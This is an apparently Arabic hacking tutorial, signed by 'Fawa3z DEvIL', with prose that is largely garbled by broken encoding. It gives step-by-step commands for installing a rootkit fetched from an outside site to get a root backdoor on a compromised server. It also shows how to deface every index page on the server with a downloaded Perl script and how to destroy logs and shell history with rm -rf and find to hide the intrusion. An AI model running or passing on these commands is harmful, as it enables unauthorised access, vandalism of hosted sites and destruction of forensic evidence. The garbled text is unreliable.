م ا٢ تػغ األه ػهع اظالؼ١اخ

id rootا٢ طالؼ١اذا

م ا٢ ترف١م األه

su

ألـم اهخ وا اىاي هلل ؼك

:.حثب١ج اشث و١ج ع اغ١شفش .:

تؼك اؽظي ػ طالؼ١اخ اهخ م ا٢ ترصث١د اهخ و١د افائكج

هظع ١هفه تؼك إطـ١اق اش إوارح أؼر١اؿ١ا ػك إواح

اش ام ونػا ف ا١هفه ػ اهخ و١د األا فرػ فم

تا١هفه اظافح ٠ون ٠ؽ طالؼ١اخ نخ ؼا نظػا ١هفه

ه أـه أال م تؽة اهخ و١د ف إ ىا تا١هفه تئرفكا

اه اؽة

wget http://fawazhack.com/update/rootkit-v1.0.zip ش م تفه اؼغؾ ػ اهخ و١د تئرفكا أه افه

Unzip rootkit-v1.0.zip

ش م تاكـي ػ١ تاأله

cd v1.0

٠ظك ػكخ فاخ ف عك اهخ و١د م األ تئػـاء اف

األا ف اهخ و١د

777 ج ارظان٠ػ اىا Setupتئػـاء م

chmod 777 setup

م األ فمؾ ترشغ١ اهخ و١د ػ ا١هفه تاأله ارا

./setup password port

فم الؼظ األه ٠رى نل ه

نل ه passwordم تػغ تكاي

م تػغ فم ؼ١ ام ه٠ك االذظاي ػ١ تؼك portتكاي

ذهو١ة اهخ و١د

م تاألرظان ل١ال ن٠صا ٠ر ػ اهخ و١د

puttyتؼك ذصث١د اهخ و١د م األ تئرفكا تهاط ٠

host name(or IP address)ف ـاح م تػغ إ ت ا١هفه

اثنخ ام ػؼا ف اهخ و١د portف ـاح

ش ف ذأذ اشاشح اقاء

ا٢ ل تىراتح ا١ون

Root

اهل اه ام ػؼا ف اهخ و١د

ل تػؼ ا٢ غ اؼ ػك وراتح اهل اه ال٠ظه

اؽك هلل ذ االذظاي

:.ع اط د٠فظ .:

ااي ق٠ف ظ١فر ٠م ترغ١ه ظ١غ طفؽاخ االغ اهئ١١ح

١ىذ اع١كج أ وا األكو ف عك ف ما اعك عك أـه ش

index.php ٠م ترغ١ها م أفؼ ١ىاذ

أ وا ا١هفه ٠ؽ الغ وص١هج ارؼة أ ذم ترغ١ه األكو

اؼكا ذ األـه م االقا ذم ترغ١ه ظ١غ اظفؽاخ اهئ١١ح ق

هنن ػ اظفؽاخ اهئ١١ح الغ ذغ١١ها

perlاىهتد ثهط تغح اث١هي

م ترشغ١

م تؽة اف إ إ ىا تا١هفه

wget http:// /fawazhack.com/update/md.zip

فه اؼغؾم األ ب

unzip md.zip

تؼك فه اؼغؾ ػ األقا م تػغ األه ارا

إلظان ـ١اناخ األقاperl mass.pl

اف١اناخ ف األقا ؿه٠مح ذشغ١ا musage : perl mass.pl <path too u're index>

mexample : perl mass.pl /tmp/index.html

<path too u're index طفؽح االـرهاق نافؼ١ ػ١ ااىا

ؼر ٠ثم tmp ػ ا١هفه ػ عك طفؽح االـرهاقاال ؽة ارشغ١أه

األ شغ اىهتد تأه ذشغ١

perl mass.pl /tmp/index.html

إلظان االغ ار ػ ا١هفه

http://whois.webhosting.info

ل تاكـي إ الغ ػغ إ ت ا١هفه ش افك تؼكا إػغؾ

ػ ف إ ت ا١هفه ف الغ ذظه ارائط

:.غح أثاسن اغ١شفش .:

تؼك ػ ااي ق٠ف التك ػ أشانن ػ ا١هفه

م تػ فاخ اق افائكج لاه ا١هفه ٠م ترفى٠ اإل ت

اشانن ف ا١هفه

م ١ا أاه ػ فاخ اق ال٠ظك ه أشه تؼكا إ شاءاهلل

التك ذـث١ما وا

rm -rf /tmp/logs

rm -rf $HISTFILE

rm -rf /root/.ksh_history

rm -rf /root/.bash_history

rm -rf /root/.ksh_history

rm -rf /root/.bash_logout

rm -rf /usr/local/apache/logs

rm -rf /usr/local/apache/log

rm -rf /var/apache/logs

rm -rf /var/apache/log

rm -rf /var/run/utmp

rm -rf /var/logs

rm -rf /var/log

rm -rf /var/adm

rm -rf /etc/wtmp

rm -rf /etc/utmp

find / -name *.bash_history -exec rm -rf {}

\;

find / -name *.bash_logout -exec rm -rf {} \;

find / -name "log*" -exec rm -rf {} \;

find / -name *.log -exec rm -rf {} \;

اخاحت

ال خري يف كامت العلم

Fawa3z DEvIL

Fawazhack@hotmail.com

http://www.js-hack.com/vb